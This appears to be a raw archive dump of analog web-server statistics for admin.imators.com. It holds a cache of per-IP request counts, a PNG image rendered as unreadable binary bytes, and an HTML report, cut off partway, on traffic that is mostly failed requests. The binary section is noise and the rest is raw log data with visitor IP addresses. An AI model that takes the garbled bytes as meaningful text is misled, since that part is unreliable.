1 0 0 28744848 0 0 28744848 0 198.235.24.26 5 0 0 0 1 0 0 29172446 0 0 29172446 0 34.16.182.179 5 0 0 0 2 0 0 29002406 0 0 29002406 0 68.183.49.235 5 0 0 0 1 0 0 28711615 0 0 28711615 0 205.210.31.97 5 0 0 0 2 0 0 29004901 0 0 28918830 0 198.235.24.22 5 0 0 0 20 0 0 29285998 0 0 29285998 0 34.145.149.248 5 0 0 0 1 0 0 29188628 0 0 29188628 0 198.235.24.20 5 0 0 0 1 0 0 29046208 0 0 29046208 0 198.235.24.19 5 0 0 0 1 0 0 29301950 0 0 29301950 0 35.217.24.226 5 0 0 0 1 0 0 28935874 0 0 28935874 0 198.235.24.17 5 0 0 0 1 0 0 29175208 0 0 29175208 0 205.210.31.92 5 0 0 0 1 0 0 28686634 0 0 28686634 0 198.235.24.16 5 0 0 0 1 0 0 29375364 0 0 29375364 0 136.107.27.212 5 0 0 0 1 0 0 29361833 0 0 29361833 0 205.210.31.87 5 0 0 0 1 0 0 29349448 0 0 29349448 0 34.168.171.58 5 0 0 0 1 0 0 29347438 0 0 29347438 0 198.235.24.11 5 0 0 0 1 0 0 29371630 0 0 29371630 0 3.254.200.255 5 0 0 0 1 0 0 28855125 0 0 28855125 0 45.135.57.32 5 0 0 0 1 0 0 29337601 0 0 29337601 0 205.210.31.85 5 0 0 0 1 0 0 29177744 0 0 29177744 0 205.169.39.7 5 0 0 0 18 0 0 28729323 0 0 28729323 0 206.81.24.227 5 0 0 0 4 0 0 28816806 0 0 28816806 0 159.65.17.250 5 0 0 0 1 0 0 28759620 0 0 28759620 0 205.169.39.6 5 0 0 0 1 0 0 29080883 0 0 29080883 0 34.116.247.199 5 0 0 0 21 0 0 29345024 0 0 29345024 0 45.149.173.227 5 0 0 0 2 0 0 29125511 0 0 29125511 0 167.94.138.59 5 0 0 0 1 0 0 29212185 0 0 29212185 0 205.210.31.76 5 0 0 0 2 0 0 29355555 0 0 28998737 0 205.210.31.75 5 0 0 0 2 0 0 29323968 0 0 29317808 0 192.159.99.83 5 0 0 0 1 0 0 29099290 0 0 29099290 0 38.242.195.184 5 0 0 0 5 0 0 29348973 0 0 29348973 0 95.25.150.103 5 0 0 0 2 0 0 29013935 0 0 28741463 0 205.210.31.70 5 0 0 0 1 0 0 29032390 0 0 29032390 0 47.79.1.234 5 0 0 0 1 0 0 29363933 0 0 29363933 0 109.196.71.44 5 1 0 0 0 29346542 0 0 29346542 0 0 87 54.169.41.181 5 0 0 0 1 0 0 29043242 0 0 29043242 0 205.210.31.64 5 0 0 0 2 0 0 28649630 0 0 28649630 0 144.91.106.14 5 0 0 0 11 0 0 29145055 0 0 29144973 0 103.129.215.7 5 0 0 0 2 0 0 29244879 0 0 29244879 0 185.177.72.108 5 0 0 0 1 0 0 29371908 0 0 29371908 0 31.173.84.13 5 0 0 0 3 0 0 28907424 0 0 28907424 0 139.59.30.116 5 0 0 0 1 0 0 28892617 0 0 28892617 0 167.94.138.42 5 0 0 0 2 0 0 29146055 0 0 29146055 0 106.75.140.229 5 0 0 0 1 0 0 29194579 0 0 29194579 0 205.210.31.60 5 0 0 0 3 0 0 28957921 0 0 28957921 0 64.227.174.38 5 0 0 0 1 0 0 29196227 0 0 29196227 0 205.210.31.59 5 0 0 0 21 0 0 29235783 0 0 29235782 0 13.215.153.239 5 0 0 0 1 0 0 28979168 0 0 28979168 0 205.210.31.58 5 0 0 0 163 0 0 29175678 0 0 29175678 0 185.177.72.104 5 0 0 0 1 0 0 29366951 0 0 29366951 0 167.94.146.56 5 0 0 0 1 0 0 28936255 0 0 28936255 0 167.94.138.37 5 0 0 0 1 0 0 28641527 0 0 28641527 0 167.94.146.55 5 0 0 0 1 0 0 29081462 0 0 29081462 0 5.135.58.201 5 0 0 0 3 0 0 28978199 0 0 28978199 0 157.245.126.139 5 0 0 0 1 0 0 29204132 0 0 29204132 0 34.55.93.52 5 0 0 0 2 0 0 28924724 0 0 28924724 0 165.227.72.13 5 0 0 0 1 0 0 28645222 0 0 28645222 0 3.0.96.28 5 0 0 0 21 0 0 29258704 0 0 29258704 0 209.97.180.8 5 20 4 4 37 28802840 28802838 28818370 28802835 28802836 28681764 10148 109.128.120.118 5 0 0 0 1 0 0 28839571 0 0 28839571 0 104.164.161.118 5 0 0 0 12 0 0 29030676 0 0 29030676 0 18.130.41.214 5 0 0 0 1 0 0 29352604 0 0 29352604 0 78.30.210.83 5 0 0 0 2 0 0 28836855 0 0 28836855 0 206.81.15.27 5 0 0 0 2 0 0 29299207 0 0 28656570 0 205.210.31.45 5 0 0 0 2 0 0 28905253 0 0 28905253 0 51.195.166.174 5 0 0 0 1 0 0 28976280 0 0 28976280 0 205.210.31.42 5 0 0 0 3 0 0 29138560 0 0 29138560 0 142.93.239.21 5 0 0 0 279 0 0 29397689 0 0 29361975 0 13.79.87.25 5 0 0 0 1 0 0 28744936 0 0 28744936 0 205.210.31.39 5 0 0 0 1 0 0 29356878 0 0 29356878 0 205.210.31.40 5 0 0 0 1 0 0 29328065 0 0 29328065 0 205.210.31.38 5 0 0 0 1 0 0 29285243 0 0 29285243 0 205.210.31.37 5 0 0 0 3 0 0 29007815 0 0 29007815 0 68.183.204.17 5 0 0 0 1 0 0 29351053 0 0 29351053 0 34.118.97.59 5 0 0 0 3 0 0 29368457 0 0 29368457 0 193.107.193.230 5 0 0 0 144 0 0 29373638 0 0 29373637 0 4.241.111.42 5 0 0 0 1 0 0 28715145 0 0 28715145 0 205.210.31.33 5 0 0 0 1 0 0 28912565 0 0 28912565 0 54.167.92.154 5 0 0 0 91 0 0 29383909 0 0 29383909 0 4.217.198.31 5 0 0 0 1 0 0 28669825 0 0 28669825 0 52.214.63.137 5 1 0 0 0 28817163 0 0 28817163 0 0 87 16.171.146.214 5 0 0 0 1 0 0 29351052 0 0 29351052 0 34.123.170.104 5 0 0 0 1 0 0 29287848 0 0 29287848 0 205.210.31.30 5 0 0 0 1 0 0 29408689 0 0 29408689 0 35.212.144.19 5 0 0 0 1 0 0 28915502 0 0 28915502 0 205.210.31.28 5 0 0 0 3 0 0 29099108 0 0 29099108 0 68.183.207.193 5 0 0 0 8 0 0 28739841 0 0 28739839 0 165.154.104.103 5 0 0 0 1 0 0 28682890 0 0 28682890 0 205.210.31.27 5 3 2 0 48 28730053 0 28730061 28730035 0 28730032 1663 213.74.219.234 5 0 0 0 2 0 0 29208627 0 0 28939921 0 205.210.31.25 5 0 0 0 1 0 0 28979318 0 0 28979318 0 34.41.67.245 5 0 0 0 1 0 0 28654107 0 0 28654107 0 205.210.31.21 5 0 0 0 3 0 0 29088197 0 0 29088197 0 134.209.81.22 5 0 0 0 2 0 0 29353631 0 0 29271047 0 34.1.24.197 5 0 0 0 1 0 0 29283753 0 0 29283753 0 196.251.71.43 5 0 0 0 63 0 0 29388817 0 0 29388817 0 45.148.10.250 5 0 0 0 2 0 0 29088877 0 0 29088877 0 139.59.184.14 5 0 0 0 1 0 0 29320034 0 0 29320034 0 34.168.79.94 5 0 0 0 9 0 0 29374988 0 0 29308785 0 45.148.10.246 5 0 0 0 1 0 0 28641369 0 0 28641369 0 213.188.94.52 5 0 0 0 2 0 0 29189562 0 0 29189562 0 147.182.154.64 5 0 0 0 4 0 0 28731881 0 0 28731881 0 206.81.23.13 5 0 0 0 1 0 0 29259042 0 0 29259042 0 154.26.128.67 5 0 0 0 1 0 0 29294857 0 0 29294857 0 45.148.10.245 5 0 0 0 3 0 0 29353464 0 0 29319262 0 205.210.31.12 5 0 0 0 1 0 0 29100021 0 0 29100021 0 173.208.148.34 5 0 0 0 2 0 0 28856674 0 0 28856674 0 146.190.168.182 5 0 0 0 2 0 0 29307899 0 0 28748878 0 205.210.31.10 5 0 0 0 4 0 0 28741111 0 0 28731908 0 45.148.10.241 5 1 0 0 0 28641362 0 0 28641362 0 0 87 18.225.10.30 5 0 0 0 1 0 0 28663132 0 0 28663132 0 169.150.254.84 5 0 0 0 1 0 0 29086060 0 0 29086060 0 45.148.10.235 5 0 0 0 1 0 0 29350815 0 0 29350815 0 95.173.197.84 5 0 0 0 20 0 0 28992845 0 0 28992845 0 206.189.225.181 5 0 0 0 1 0 0 28641367 0 0 28641367 0 93.123.39.131 5 0 0 0 145 0 0 28770931 0 0 28770883 0 81.243.18.204 5 0 0 0 1 0 0 28641368 0 0 28641368 0 168.151.108.250 5 0 0 0 1 0 0 29361666 0 0 29361666 0 185.218.109.244 5 0 0 0 1 0 0 29247860 0 0 29247860 0 195.178.110.75 5 0 0 0 1 0 0 29378647 0 0 29378647 0 196.251.71.13 5 0 0 0 1 0 0 29060915 0 0 29060915 0 89.248.163.34 5 0 0 0 1 0 0 29373383 0 0 29373383 0 80.251.149.159 5 0 0 0 2 0 0 28656981 0 0 28656981 0 46.101.9.69 5 0 0 0 21 0 0 28994986 0 0 28994986 0 57.128.16.104 5 0 0 0 1 0 0 29140806 0 0 29140806 0 195.178.110.64 5 0 0 0 2 0 0 29083213 0 0 29083213 0 143.198.32.128 5 0 0 0 1 0 0 29050919 0 0 29050919 0 170.64.180.241 5 0 0 0 3 0 0 28822747 0 0 28736926 0 45.148.10.206 5 0 0 0 2 0 0 29354742 0 0 29354742 0 81.222.244.132 5 0 0 0 1 0 0 29083379 0 0 29083379 0 152.42.229.235 5 0 0 0 1 0 0 29025048 0 0 29025048 0 18.204.42.74 5 0 0 0 1 0 0 29357594 0 0 29357594 0 5.129.120.126 5 0 0 0 6 0 0 28817240 0 0 28641386 0 5.164.29.116 5 1 1 0 3 28696002 0 28696002 28696002 0 28696002 772 37.62.69.188 5 0 0 0 1 0 0 29173779 0 0 29173779 0 47.82.60.213 5 0 0 0 1 0 0 28993882 0 0 28993882 0 217.182.186.47 5 0 0 0 2 0 0 28757102 0 0 28701054 0 87.236.176.70 5 0 0 0 1 0 0 29026504 0 0 29026504 0 47.82.11.106 5 0 0 0 1 0 0 29317876 0 0 29317876 0 35.174.4.131 5 0 0 0 5 0 0 29364332 0 0 29364332 0 185.218.109.196 5 0 0 0 1 0 0 29049230 0 0 29049230 0 45.148.10.174 5 0 0 0 4 0 0 28734659 0 0 28734659 0 159.65.151.198 5 0 0 0 2 0 0 28996872 0 0 28996872 0 165.22.87.4 5 0 0 0 1 0 0 28737541 0 0 28737541 0 195.178.110.35 5 0 0 0 1 0 0 29382042 0 0 29382042 0 135.181.213.219 5 0 0 0 3 0 0 29331199 0 0 29298445 0 147.93.158.41 5 0 0 0 16 0 0 29402830 0 0 29402830 0 143.198.222.56 5 1 0 0 0 29080865 0 0 29080865 0 0 87 3.17.57.190 z 0 1 1 28641362 0 z 2 56 0 29346542 4467 z 3 40 20 28802840 22864 z 4 8 4 28695144 17887 c 200 105 29346542 c 302 6 28802838 c 401 6876 29415979 c 403 167 29377835 c 404 505 29415979 c 500 3 28802835 refsite.png 0000644 00000005256 15114762035 0006727 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� ?IDATx��M��8F�H�5Nv�� 4�x]ϻ&5�e� ?$x�$�����1F��0*R�~1D~��G�B9��_ߎއR��C���"����?:YJ0$ˢò X �`Y ,�e�, ��� X �`Y ,�e�, ��� �e�l�rzd�d~�=;!Ѳ�~�m��nѺ�0��j�� �~oj��Y�*WV��!K>����.K߾���C���"*KMY]����ʒ��]Y�{�Q�d��Վ���>��_���Z]���@dM�veݫ�[�,�ȺטD�,��@dD�,�x<n���]Y&�*K^aY������\�9�Ȫ�ԇ(K?"d�ږY���,��L9��Ȣ��I�o'-ҧ5I�iX1�mk&K.g�粔���Xp���\99$��o[aY����e=�Y�-k�m9�t����Is����J�_�n�n���f�]SٕE�,���\d��Ĕ�w��ݶ5�jGm��:Q�_c ���,�C��f}#�<6<Q���C�uM���N��y��ۖը@9���Y!��f�|ҏ�eiǕ�C��� �e�������$ˮ�,�$�� �BVw�Z�b�Z�re)+k|�>�wû�.w7�S?ɲ��8��$ۖl������$�%jx�[(�դ�n}�=���E�F����|����?��,t�洧�;�d7�k��j&kvd]Lexs�N�U�dͶ,i��}��Ȫd�t[֥�/���JJ�$�-�ܲ�F�~��r�)Kc������$ks>k�"[Yoɒ�XSe��3Y���c涶d]��zr�� 1,�'ox�7��C�e5��������c�6dIw�Ni-.!� u�IVh>˕u��ֆ��l���B����?����s[aYr>֩�>�dJ�/k6���:vn�l�|�Y�,���ڹ����b��~b�9����g���� ʒ˱^Se�K��>8�E��X�d5����'�AY��`����?��Z�[Z�K�鲊��aY !Y��s��*>�Y��rJ+V���̖�y�@s�ȚJ��t�l�V;1��6�� ˗B��"e�r8�5�#��:bk�_��������)����߮�[ r&Y�]���O�2��,O'Y�|�8�u���`Yciݦ�a6Y�)��]���jf9|���\��jY���be���BV?���*��⬐�`aM�u���.��,w>K���YCiM>��%�xq����H�<��('ӧ=��e5ϗuZ`YnY�v�Kk�𘬢�ipY}i}�,�hg�M��e�)ӿ/qѲ�ܲ��Y��9+9BV�á����Z ���-������0Bֲid��m�5s[1�li���:��Y���!�Yey��sq�W�n˺���wxT֢i�1�Mќ��hY͐×�:|nk-k?�i�9\�Z�g���hYc3���g���xY������g�ߟ��$Y��>r�z�`S���<Q�iYɢ;�&�1�ʝ�J��vx�E��!�"qeY�~��u��Un���ՕV��Y���!�bY~d��Ѳ�û)���㲊=��jK�e�GͲ ���"���,�,�e���,`�Ͳ�\��_�e��,��fYt8���Y�,���?��9���©��X�,�e�, ��� X �`Y ,�e�, ��rM,��а,��� X@�u��{0dY, ���%Pl�bY,�e�,��_��B�C����{�(7�,�e��$ nY,�e�,��߀�F��=�Q�Qra�,��� �ϰH���L"E�B ?�)��SȲX �����ݲ��M���bYЧ��Rx ��N���bY!Y��a�)�zFi�^X,!(+�OaXV��*��XBXV���� Y�K���bY��氂n��[Z֦���UCa�L�~�,��:�Uֶ�|]����'+W�(,���-+W�Hឬ<�UšP���r@�$���r��d����z��Z:AVrת���R�V5�$+-����$+)���&+!�ME!$ʒѶ�rE�ݶjjX�*+�mUհYVT۪�a ����U�+����y��,�m�ְ"Kh(���B��$֗A���Xa(��Ħ� T�D��`Y�𩢺�~Ձ�ڍbS��Y�Q���%BV�Pu���'FV�WW� 4D��t]���ꈖe��q���^U ��-dۗӓ.��e�, ��� X �`Y ,�e�, ���LV�Wgƛ�����x���%��o�����۔eT�6ܟ���T`��sxY�-�!�ͅ��켵_hm���O+h#�]bn��f�u.ݕ�2��ה�ߚ�ү�5���τOV;��@��f�pW�([D�'v�*gk��55�iU��k)_��7�� L�Hi����^n� � Y�.�ƭ G�p�k��|-�>zL@����X_�v��4�Ye G��Ϙ���r�0�Z��g�[!Yf�Cd��=���% �������3_�-c8��$˾��Z6�g �_V�Y�س���� ���ܜߗ�i���B�MJ���oӸ�y�O�O����w=�$��-/�v���n $�"��f��, ��� X �`Y ,�e�, ��� X �`Y V�fHt�~�`H���ގމR��Cpa�y\Xd��1Z-��W,� IEND�B`� 9.html 0000644 00000113072 15114762035 0005612 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for admin.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://admin.imators.com/">admin.imators.com</a></h1> <p class="analysisspan">Program started on Tue, Sep 30 2025 at 12:11 PM. <br />Analyzed requests from Fri, Jun 14 2024 at 8:01 PM to Tue, Sep 30 2025 at 5:57 AM (472.41 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Sep 30 2025 at 12:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 98 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 25 (0) <br /><span class="gensumtitle">Failed requests:</span> 3,057 (5) <br /><span class="gensumtitle">Redirected requests:</span> 6 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 44 (769) <br /><span class="gensumtitle">Distinct hosts served:</span> 45 (782) <br /><span class="gensumtitle">Data transferred:</span> 43.61 kilobytes (0 bytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 94 bytes (0 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2024</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">10</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">26</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Dec 2024</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Feb 2025</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Mar 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Apr 2025</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">May 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Jun 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Jul 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Aug 2025</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2024 (13 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Mon</td><td class="R">9</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Tue</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Wed</td><td class="R">15</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Thu</td><td class="R">12</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Fri</td><td class="R">48</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 1</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 2</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 3</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 4</td><td class="R">2</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 5</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 6</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 7</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 8</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 9</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">10</td><td class="R">3</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">11</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">12</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">13</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">14</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">17</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">18</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">19</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">20</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">22</td><td class="R">27</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">23</td><td class="R">20</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">98</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">22.73%</td><td class="xl">109</td></tr> <tr><td class="R">14</td><td class="b"> 2.01%</td><td class="xl">194.87</td></tr> <tr><td class="R">10</td><td class="b">16.15%</td><td class="xl">81.245</td></tr> <tr><td class="R">7</td><td class="b"> 1.36%</td><td class="xl">13</td></tr> <tr><td class="R">7</td><td class="b"> 1.36%</td><td class="xl">23</td></tr> <tr><td class="R">5</td><td class="b"> 0.97%</td><td class="xl">18</td></tr> <tr><td class="R">4</td><td class="b"> 4.56%</td><td class="xl">57</td></tr> <tr><td class="R">4</td><td class="b"> 0.78%</td><td class="xl">16</td></tr> <tr><td class="R">3</td><td class="b"> 0.58%</td><td class="xl">3</td></tr> <tr><td class="R">3</td><td class="b"> 8.29%</td><td class="xl">165.227</td></tr> <tr><td class="R">3</td><td class="b"> 3.72%</td><td class="xl">213.74</td></tr> <tr><td class="R">3</td><td class="b"> 8.30%</td><td class="xl">64.226</td></tr> <tr><td class="R">2</td><td class="b"> 0.39%</td><td class="xl">52</td></tr> <tr><td class="R">2</td><td class="b"> 0.39%</td><td class="xl">54</td></tr> <tr><td class="R">2</td><td class="b">18.97%</td><td class="xl">142.93</td></tr> <tr><td class="R">2</td><td class="b"> 0.39%</td><td class="xl">35</td></tr> <tr><td class="R">1</td><td class="b"> 1.73%</td><td class="xl">172.225</td></tr> <tr><td class="R">1</td><td 